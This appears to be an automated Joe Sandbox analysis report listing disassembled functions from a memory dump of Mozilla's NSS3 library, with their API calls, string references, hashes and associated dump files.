Instruction ID: 2c78f43ab96a04df3a622014fe4b8de0fbf23ae96a36f0dd0edd23ee5ee15cd6
Opcode Fuzzy Hash: 1f1889a0d239145c46bb3af81ab34011a7826add02f51127c089eae5df7827e9
Instruction Fuzzy Hash: 9EF044B5800104BBDF01AB669C49D5B3F2DDF86664F068424FE0A56202DB35A964D6B3

Function 6D574DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6D574DCB

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6D574DE1

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6D574DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D574E59

Part of subcall function 6D55FAB0: free.MOZGLUE(?,-00000001,?,?,6D4FF673,00000000,00000000), ref: 6D55FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D63300C,00000000), ref: 6D574EB8
SECOID_FindOID_Util.NSS3(?), ref: 6D574EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6D574F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D57521A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: ddecf55194183a85df28febed657e3a6c24652d841d7f778b981e5f2fa5ac521
Instruction ID: 4eb456efc188d8f15b5961c7a677e534d0f8fdd4d12b5e7d4ffb2a0c7ef7a163
Opcode Fuzzy Hash: ddecf55194183a85df28febed657e3a6c24652d841d7f778b981e5f2fa5ac521
Instruction Fuzzy Hash: 76F18B71E0420ACBDB18CF54D840BBEB7B2FF88355F258569E914AB781E735E981CB90

Function 6D504FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6D650148,?,6D516FEC), ref: 6D50502A
PR_NewLock.NSS3(00000001,00000000,6D650148,?,6D516FEC), ref: 6D505034
PL_NewHashTable.NSS3(00000000,6D55FE80,6D55FD30,6D5AC350,00000000,00000000,00000001,00000000,6D650148,?,6D516FEC), ref: 6D505055
PL_NewHashTable.NSS3(00000000,6D55FE80,6D55FD30,6D5AC350,00000000,00000000,?,00000001,00000000,6D650148,?,6D516FEC), ref: 6D50506D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: ba0f5e8edd6bcdd5a7caf650e765b499df8d458a96dd876c7f853bc59204fc62
Instruction ID: b13f96dd7b793c2c06ea63740ddf41db7294f85d5c986730aac31a1e80309426
Opcode Fuzzy Hash: ba0f5e8edd6bcdd5a7caf650e765b499df8d458a96dd876c7f853bc59204fc62
Instruction Fuzzy Hash: 0631FD719092519BDF35CF668848B3B7BBC9B5B359F028425EB0487640DB758860CBE3

Function 6D4A2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6D4A2F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6D4A2FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6D4A3005
memcpy.VCRUNTIME140(?,?,?), ref: 6D4A30EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D4A3131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4A3178

Strings

database corruption, xrefs: 6D4A316C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4A3022, 6D4A3156, 6D4A3162, 6D4A318A, 6D4A3196, 6D4A31A2, 6D4A31AE, 6D4A31BA, 6D4A31C6
%s at line %d of [%.10s], xrefs: 6D4A3171

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpy$memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 984749767-598938438
Opcode ID: bd24fd7edda5b55c95496dd521e374446853ec4460d7ac0598eb1271dc523f5c
Instruction ID: 01d942be0f96dece260c1b144787d08d67f201f91d05116541d7fe9185355d63
Opcode Fuzzy Hash: bd24fd7edda5b55c95496dd521e374446853ec4460d7ac0598eb1271dc523f5c
Instruction Fuzzy Hash: F2B19F70E042259BCB18CFDDC885ABEB7B1BF59300F588129E845B734AE7749D42CBA4

Function 6D4F2D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6D4F2D69

Strings

winUnmapfile2, xrefs: 6D4F2F7F
am, xrefs: 6D4F2DD0
@am, xrefs: 6D4F2E24
winSeekFile, xrefs: 6D4F2E9C
winTruncate2, xrefs: 6D4F2EF8
winTruncate1, xrefs: 6D4F2EBE
Pam, xrefs: 6D4F2E74, 6D4F2EC5, 6D4F2F32, 6D4F2F5C
winUnmapfile1, xrefs: 6D4F2F55

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: __allrem
String ID: @am$Pam$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$am
API String ID: 2933888876-2946029689
Opcode ID: a8d3629e43fe3d675acbe4993beeffd4eb78baa66dd3370784f7fe5d1238e12d
Instruction ID: 0490faad915e2e1643132a3189d0865529c353e94cd53041813c8ef5d410e072
Opcode Fuzzy Hash: a8d3629e43fe3d675acbe4993beeffd4eb78baa66dd3370784f7fe5d1238e12d
Instruction Fuzzy Hash: 69619E75A04355DFDB54CF68D890B6A77B1FB89310F208128E919EB3A0DB31AD47CB91

Function 6D577F90 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

PR_GetMonitorEntryCount.NSS3(?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D577FB2

Part of subcall function 6D4FBA40: TlsGetValue.KERNEL32 ref: 6D4FBA51
Part of subcall function 6D4FBA40: TlsGetValue.KERNEL32 ref: 6D4FBA6B
Part of subcall function 6D4FBA40: EnterCriticalSection.KERNEL32 ref: 6D4FBA83
Part of subcall function 6D4FBA40: TlsGetValue.KERNEL32 ref: 6D4FBAA1
Part of subcall function 6D4FBA40: _PR_MD_UNLOCK.NSS3 ref: 6D4FBAC0

PR_EnterMonitor.NSS3(?,?,?,00000002,00000050,?,?,?,?,?,00000000), ref: 6D577FD4

Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90AB
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90C9
Part of subcall function 6D5C9090: EnterCriticalSection.KERNEL32 ref: 6D5C90E5
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C9116
Part of subcall function 6D5C9090: LeaveCriticalSection.KERNEL32 ref: 6D5C913F

Part of subcall function 6D579430: PR_SetError.NSS3(FFFFD0AC,00000000), ref: 6D579466

PR_ExitMonitor.NSS3(?), ref: 6D57801B
PR_EnterMonitor.NSS3(?), ref: 6D578034
TlsGetValue.KERNEL32 ref: 6D5780A2
PR_SetError.NSS3(FFFFE001,00000000), ref: 6D5780C0
PR_ExitMonitor.NSS3(?), ref: 6D57811C
PR_ExitMonitor.NSS3(?), ref: 6D578134

Strings

), xrefs: 6D5780DB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
String ID: )
API String ID: 3537756449-2427484129
Opcode ID: d576cdf7c3683683b03ba0e430cb2e4bd061a6d3c390bff983e85010c5358793
Instruction ID: 15c32f6797bf78492aeea71452bc65d13844ea3c0f48644ca20b7d7a2b85022f
Opcode Fuzzy Hash: d576cdf7c3683683b03ba0e430cb2e4bd061a6d3c390bff983e85010c5358793
Instruction Fuzzy Hash: B0516B75A087069BE7399F34DC01BBB7BB0AF92319F140C2CDE5956951E731A904CB93

Function 6D4F69A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6D48CA30: EnterCriticalSection.KERNEL32(?,?,?,6D4EF9C9,?,6D4EF4DA,6D4EF9C9,?,?,6D4B369A), ref: 6D48CA7A
Part of subcall function 6D48CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D48CB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6D4F6A02
EnterCriticalSection.KERNEL32(?), ref: 6D4F6AA6
LeaveCriticalSection.KERNEL32(?), ref: 6D4F6AF9
sqlite3_free.NSS3(00000000), ref: 6D4F6B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6D4F6BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6D4F6B9F
`am, xrefs: 6D4F6A53
Pam, xrefs: 6D4F6B1F
winDelete, xrefs: 6D4F6B71

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: Pam$`am$delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1307106502
Opcode ID: a1a86eba7c6d79e8d19dd34ffd68f99117d8e807f4e738731574119e4cf4e4ec
Instruction ID: 3e6e1c1006c8c90134a39a13fe76a00ecbbbe5ab375b5c8a60d9dcd0b228435a
Opcode Fuzzy Hash: a1a86eba7c6d79e8d19dd34ffd68f99117d8e807f4e738731574119e4cf4e4ec
Instruction Fuzzy Hash: 0C51E332A082269BEF08DF66DC58FBE3775EF8B310B144129E516972A0DB745D42CBD2

Function 6D51FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6D51FCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6D51FCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6D51FCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D51FD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6D51FD46
PORT_Alloc_Util.NSS3(00000001), ref: 6D51FD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6D51FD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6D51FD84

Strings

:, xrefs: 6D51FD78

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: bc9f609099c151f60ecefe7c609e21e57e29e8965d4a9f6fa43b54e2afa3f73e
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 0431F4B3D0C2065BFB058AA8DC01B7F77A8AF54318F064935DD19A7A11E772E904C7D2

Function 6D500F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6D500F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6D500F84

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6D51F59B,6D62890C,?), ref: 6D500FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6D500FC1

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6D500FDB
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D500FEF
PL_FreeArenaPool.NSS3(?), ref: 6D501001
PL_FinishArenaPool.NSS3(?), ref: 6D501009

Strings

security, xrefs: 6D500F5C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: security
API String ID: 2061345354-3315324353
Opcode ID: 86312b5ab02d731218b8260124e0b5ce2b5ea19aabdacb21aadfbd72c43dcaeb
Instruction ID: 1e13d28599e4fb4ae32757439d0979ae71ce91b7d04e509a3e144d67941025af
Opcode Fuzzy Hash: 86312b5ab02d731218b8260124e0b5ce2b5ea19aabdacb21aadfbd72c43dcaeb
Instruction Fuzzy Hash: 6C2122B1908344ABEB059F29DC80E7B77A8EF8825DF018519FD1897212FB31D911CBE2

Function 6D506DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6D507D8F,6D507D8F,?,?), ref: 6D506DC8

Part of subcall function 6D55FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D55FE08
Part of subcall function 6D55FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D55FE1D
Part of subcall function 6D55FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D55FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6D507D8F,?,?), ref: 6D506DD5

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D628FA0,00000000,?,?,?,?,6D507D8F,?,?), ref: 6D506DF7

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D506E35

Part of subcall function 6D55FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D55FE29
Part of subcall function 6D55FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D55FE3D
Part of subcall function 6D55FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6D55FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D506E4C

Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D628FE0,00000000), ref: 6D506E82

Part of subcall function 6D506AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6D50B21D,00000000,00000000,6D50B219,?,6D506BFB,00000000,?,00000000,00000000,?,?,?,6D50B21D), ref: 6D506B01
Part of subcall function 6D506AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6D506B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D506F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D506F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D628FE0,00000000), ref: 6D506F6B
PR_SetError.NSS3(FFFFE005,00000000,6D507D8F,?,?), ref: 6D506FE1

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: 5a5014a143dac9cef7941f1942b07ed486e14ec744600166442cd2c31170c307
Instruction ID: d057f4d97e9c47fb684d12d44d3fbe8c63fb46ef1a7d30aa278834bf77ecde99
Opcode Fuzzy Hash: 5a5014a143dac9cef7941f1942b07ed486e14ec744600166442cd2c31170c307
Instruction Fuzzy Hash: 77715D71D047479BDB04CF54CD50BBABBA4BF98248F164629E90897A11F770EAD4CBD0

Function 6D540FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D541057
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D541085
PK11_GetAllTokens.NSS3 ref: 6D5410B1
free.MOZGLUE(?), ref: 6D541107
PR_SetError.NSS3(00000000,00000000), ref: 6D541172
free.MOZGLUE(?), ref: 6D541182
free.MOZGLUE(?), ref: 6D5411A6
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6D5411C5

Part of subcall function 6D5452C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6D51EAC5,00000001), ref: 6D5452DF
Part of subcall function 6D5452C0: EnterCriticalSection.KERNEL32(?), ref: 6D5452F3
Part of subcall function 6D5452C0: PR_Unlock.NSS3(?), ref: 6D545358

PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D5411D3
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D5411F3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
String ID:
API String ID: 1549229083-0
Opcode ID: 07cb46d97aafc4251a562f7223e9463a865564ddc79f9615d6f600c716e940a7
Instruction ID: 2f5a5a8f34aac85535d289761fc982e1cb0ce358426736b15fb40028c326fec2
Opcode Fuzzy Hash: 07cb46d97aafc4251a562f7223e9463a865564ddc79f9615d6f600c716e940a7
Instruction Fuzzy Hash: 4261B3B0E043469BEB08CF65D841F6EB7B4BF44344F058529ED19AB741EB31E960CB62

Function 6D54ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE10
EnterCriticalSection.KERNEL32(?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE24
PR_Unlock.NSS3(?,?,?,?,?,?,6D52D079,00000000,00000001), ref: 6D54AE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE6F
free.MOZGLUE(85145F8B,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AE7F
TlsGetValue.KERNEL32(?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AEF1
free.MOZGLUE(6D52CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6D52CDBB,?), ref: 6D54AF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D52CDBB,?,6D52D079,00000000,00000001), ref: 6D54AF30

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
